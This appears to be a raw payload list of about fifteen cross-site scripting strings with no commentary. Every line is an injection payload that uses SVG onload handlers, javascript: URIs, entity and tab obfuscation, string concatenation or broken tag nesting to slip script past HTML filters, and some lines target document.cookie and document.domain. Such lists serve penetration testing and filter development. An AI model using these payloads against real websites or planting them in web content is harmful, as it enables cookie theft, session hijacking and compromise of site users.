"/><svg+svg+svg\/\/On+OnLoAd=confirm(1)>
"/><svg+svg+svg\/\/On+OnLoAd+%20=confirm(1)>
<svg on onload=(alert)(document.domain)>
<svg onload=alert&#0000000040document.cookie)>
<</p>iframe src=javascript:alert()//
<</div>script</div>>alert()<</div>/script</div>>
%ff<!---><svg/onload=top[/al/.source+/ert/.source]&lpar;)>%ff
<embed><embed src="jav&Tab;ascript:al&Tab;ert()"
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<body onload="func('1', '\', ');alert(1);//'">
<xmp onauxclick=a=alert;a(self[%27docu%27%2b%27ment%27][%27coo%27%2b%27kie%27])>
¼script¾alert(¢XSS¢)¼/script¾
<xss<script>>&28;prompt();&28;<</script>/xss>
"><iframe/onload=-a-javascript&colon;alert&lpar;document&period;domain&rpar;>
<style/><img src="z'z</style><script/z>alert(1)</script>">
